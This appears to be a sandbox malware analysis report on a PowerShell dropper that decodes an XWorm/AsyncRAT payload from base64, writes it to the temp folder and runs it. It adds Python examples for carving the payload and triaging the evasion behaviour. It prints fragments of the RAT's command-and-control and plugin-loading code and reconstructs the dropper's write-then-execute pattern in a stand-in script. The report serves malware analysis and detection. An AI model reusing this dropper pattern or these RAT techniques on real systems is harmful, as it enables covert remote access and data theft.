Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
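The rule hits above land on three views of one payload: the dropped tmpB20E.exe, the PE carved out of powershell.exe memory (1.2.powershell.exe.1e40029eb40.0.unpack), and the script's own process memory via INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC. That is the shape of a dropper that carries the RAT as concatenated base64, decodes it in memory and writes it to %TEMP% before executing it, and it means the payload can be recovered from the .ps1 without running it. Two caveats when reading the matches: the "v3" in rat_win_xworm_v3 is the rule's target at its creation date (2023-03-03), while the decrypted strings in the AV section identify this build as XWorm V5.6, so a version in a rule name is not the sample's version; and MALWARE_Win_AsyncRAT fires on the hard-coded User-Agent strings and "POST / HTTP/1.1" listed in its match, so family attribution should rest on the XWorm-specific strings and the decrypted configuration rather than on any single rule. The following is an added example, not code from the report, Joe Sandbox, Sekoia or ditekSHen: it carves the base64 payload from a constructed stand-in script and searches it for the thirteen rat_win_xworm_v3 markers in both ASCII and UTF-16LE; the rule's real condition is not reproduced, and the fake PE it builds is not the sample.

```python
"""Carve a base64-embedded PE out of a PowerShell dropper and check it for the
XWorm v3 marker strings listed in this report.

Added example, not code from the report, Joe Sandbox, Sekoia or ditekSHen.
Part one reproduces the "base64 encoded file + concatenation + execution"
pattern on a constructed .ps1 and decodes the payload without running it.
Part two searches the decoded bytes for the rat_win_xworm_v3 markers in both
ASCII and UTF-16LE: .NET metadata names such as $VB$Local_Port are stored
ASCII, while user strings such as "Select * from AntivirusProduct" live in
the #US heap as UTF-16LE, so a single-encoding search misses half of them.
The real rule's condition is not reproduced; only marker presence and
offsets are reported.
"""
import base64
import hashlib
import re

XWORM_V3_MARKERS = [
    "$VB$Local_Port", "$VB$Local_Host", "get_Jpeg", "get_ServicePack",
    "Select * from AntivirusProduct", "PCRestart", "shutdown.exe /f /r /t 0",
    "StopReport", "StopDDos", "sendPlugin", "OfflineKeylogger Not Enabled",
    '-ExecutionPolicy Bypass -File "', "Content-length: 5235",
]
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{8,}={0,2})"')   # double-quoted base64 literals


def carve_base64_pe(script_text):
    """Join the script's base64 string literals in source order and decode them.

    Returns the payload bytes if they start with the MZ header, else None.
    Joining in order handles "a" + "b" concatenation without evaluating
    any PowerShell.
    """
    chunks = B64_LITERAL_RE.findall(script_text)
    if not chunks:
        return None
    try:
        data = base64.b64decode("".join(chunks), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return data if data.startswith(b"MZ") else None


def scan_markers(data, markers=XWORM_V3_MARKERS):
    """Return {marker: [offsets]} for markers present as ASCII or UTF-16LE."""
    hits = {}
    for marker in markers:
        offsets = []
        for needle in (marker.encode("ascii"), marker.encode("utf-16-le")):
            pos = data.find(needle)
            while pos != -1:
                offsets.append(pos)
                pos = data.find(needle, pos + 1)
        if offsets:
            hits[marker] = sorted(offsets)
    return hits


def triage_script(script_text):
    """Carve, hash and scan; returns None when no embedded PE is found."""
    payload = carve_base64_pe(script_text)
    if payload is None:
        return None
    return {"sha256": hashlib.sha256(payload).hexdigest(),
            "size": len(payload), "markers": scan_markers(payload)}


def build_constructed_dropper():
    """Constructed stand-in for the dropper, not the real sample: a fake PE
    (MZ header, three markers as ASCII, three as UTF-16LE) embedded as
    concatenated base64 in the write-then-execute shape the report shows."""
    fake_pe = b"MZ" + b"\x00" * 62
    fake_pe += b"get_ServicePack\x00$VB$Local_Host\x00$VB$Local_Port\x00"
    fake_pe += "Select * from AntivirusProduct".encode("utf-16-le")
    fake_pe += "StopDDos".encode("utf-16-le") + "sendPlugin".encode("utf-16-le")
    b64 = base64.b64encode(fake_pe).decode()
    pieces = [b64[i:i + 40] for i in range(0, len(b64), 40)]
    script = "$p = " + " + ".join(f'"{p}"' for p in pieces) + "\n"
    script += '$out = "$env:TEMP\\tmpB20E.exe"\n'
    script += "[IO.File]::WriteAllBytes($out, [Convert]::FromBase64String($p))\n"
    script += "Start-Process $out\n"
    return script, fake_pe


if __name__ == "__main__":
    dropper, _ = build_constructed_dropper()
    result = triage_script(dropper)
    print(result["sha256"], result["size"])
    for marker, offsets in result["markers"].items():
        print(f"{marker!r}: {[hex(o) for o in offsets]}")
```

On the real sample the offsets the two Yara views report for each marker differ by a constant 0x1e00 (0x58a9 against 0x3aa9 for $VB$Local_Port, and likewise for all thirteen strings), which is what ties the dropped file to the blob found in powershell.exe memory; it is the marker set, not the offsets, that should go into a detection.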
Source: tmpB20E.exe.1.dr, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: tmpB20E.exe.1.dr, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: tmpB20E.exe.1.dr, AlgorithmAES.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, AlgorithmAES.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: tmpB20E.exe.1.dr, ClientSocket.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: tmpB20E.exe.1.dr, ClientSocket.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, ClientSocket.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, ClientSocket.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine; Classification label: mal100.troj.evad.winPS1@4/6@6/5
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Mutant created: \Sessions\1\BaseNamedObjects\RHFLgv5hS2K0LrpS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdtqpgsd.w2q.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: 20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1; ReversingLabs: Detection: 21%
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe "C:\Users\user\AppData\Local\Temp\tmpB20E.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

Source: tmpB20E.exe.1.dr, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: tmpB20E.exe.1.dr, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: tmpB20E.exe.1.dr, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: tmpB20E.exe.1.dr, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: tmpB20E.exe.1.dr, Messages.cs; .Net Code: Memory
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs; .Net Code: Memory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Code function: 4_2_00007FFAAC5B782F pushfd ; retf 4_2_00007FFAAC5B785E
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Code function: 4_2_00007FFAAC5B780F pushad ; retf 4_2_00007FFAAC5B782E
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Code function: 4_2_00007FFAAC5B785F pushad ; retf 4_2_00007FFAAC5B782E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Memory allocated: 1650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Memory allocated: 1B190000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries in the report)
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3037
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2782
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Window / User API: threadDelayed 5953
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Window / User API: threadDelayed 3861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe TID: 8012 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe TID: 8024 Thread sleep count: 5953 > 30
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe TID: 8024 Thread sleep count: 3861 > 30
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe File Volume queried: C:\ FullSizeInformation (54 identical entries in the report)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries in the report)
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: tmpB20E.exe, 00000004.00000002.3782953971.0000000001525000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0.W
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Memory allocated: page read and write | page guard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe "C:\Users\user\AppData\Local\Temp\tmpB20E.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (4 identical entries in the report)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (4 identical entries in the report)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmpB20E.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: tmpB20E.exe, 00000004.00000002.3792376298.000000001BFDA000.00000004.00000020.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3782953971.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3782953971.0000000001525000.00000004.00000020.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3792376298.000000001BF70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct (53 identical entries in the report)
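
The behaviour rows above (WMI enumeration of Win32_VideoController and of root\SecurityCenter2 AntivirusProduct, the MachineGuid registry read, and the oversized or looped thread sleeps) are the evasion-and-discovery pattern a triage script should key on. The Python below is an added example, not Joe Sandbox code and not recovered from the sample: it tags a constructed, pipe-delimited copy of such behaviour events per process and returns a verdict. The event format, the thresholds (which mirror the report's ">= 3 min" and "> 30" signature wording) and the verdict rule are assumptions of this example.

```python
"""Triage of sandbox behaviour events for evasion/discovery patterns.

Added example (not Joe Sandbox code, not recovered from the sample). Event lines
use a constructed "process | kind | detail" format modelled on the report's
"Source: ... <kind>: <detail>" rows; thresholds mirror the report's signature
wording ("Contains long sleeps (>= 3 min)", "Thread sleep count: N > 30").
"""
import re
from collections import defaultdict

LONG_SLEEP_MS = 3 * 60 * 1000   # ">= 3 min"; 922337203685477 ms is .NET TimeSpan.MaxValue
SLEEP_LOOP_MIN_COUNT = 30       # "Thread sleep count: N > 30"

# WMI class -> tag. Only the classes observed in this report are listed.
WMI_TAGS = {
    "win32_videocontroller": "vm_discovery_gpu",   # GPU name reveals VMware/VBox/Hyper-V
    "antivirusproduct": "av_discovery",            # root\SecurityCenter2 AV inventory
}

def parse_event(line):
    """Split 'process | kind | detail'. maxsplit=2 keeps '|' inside the detail
    (e.g. 'memory reserve | memory write watch') intact."""
    parts = [p.strip() for p in line.split("|", 2)]
    if len(parts) != 3:
        raise ValueError("malformed event: %r" % line)
    return parts[0], parts[1], parts[2]

def tag_event(kind, detail):
    """Map one event to a tag, or None when it is not an evasion/discovery signal."""
    d = detail.lower()
    if kind == "WMI Queries":
        m = re.search(r"from\s+([a-z0-9_]+)", d)
        return WMI_TAGS.get(m.group(1)) if m else None
    if kind == "Thread delayed":
        m = re.search(r"delay time:\s*(\d+)", d)
        return "long_sleep" if m and int(m.group(1)) >= LONG_SLEEP_MS else None
    if kind == "Thread sleep count":
        m = re.search(r"(\d+)", d)
        return "sleep_loop" if m and int(m.group(1)) > SLEEP_LOOP_MIN_COUNT else None
    if kind == "Key value queried" and "machineguid" in d:
        return "machine_guid_read"                  # stable host ID, typically used as a victim ID
    return None

def triage(lines):
    """Aggregate tags per process: {process: {tag: count}}."""
    findings = defaultdict(lambda: defaultdict(int))
    for line in lines:
        proc, kind, detail = parse_event(line)
        tag = tag_event(kind, detail)
        if tag:
            findings[proc][tag] += 1
    return {proc: dict(tags) for proc, tags in findings.items()}

def verdict(tags):
    """Heuristic (this example's own): discovery plus stalling in one process is
    the sandbox-aware loader pattern; either alone is only suspicious."""
    discovery = {"vm_discovery_gpu", "av_discovery", "machine_guid_read"} & set(tags)
    stalling = {"long_sleep", "sleep_loop"} & set(tags)
    if discovery and stalling:
        return "evasive_discovery"
    if discovery or stalling:
        return "suspicious"
    return "benign"

# Constructed sample events, modelled on the behaviour rows of this report.
SAMPLE_EVENTS = [
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | WMI Queries | IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController",
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | WMI Queries | IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | WMI Queries | IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | Thread delayed | delay time: 922337203685477",
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | Thread sleep count | 5953 > 30",
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | Key value queried | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"C:\Users\user\AppData\Local\Temp\tmpB20E.exe | Memory allocated | 1650000 memory reserve | memory write watch",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed | delay time: 922337203685477",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information | C:\ VolumeInformation",
]

if __name__ == "__main__":
    for proc, tags in triage(SAMPLE_EVENTS).items():
        print(verdict(tags), proc, tags)
```

Run as a script it prints one verdict per process; the dropped executable comes out as evasive_discovery because it pairs the WMI/registry probes with the stalling sleeps, while powershell.exe, which only sleeps, stays at suspicious.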

Stealing of Sensitive Information

Source: Yara match; File source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: tmpB20E.exe PID: 7928, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED

Remote Access Functionality

Source: Yara match; File source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE
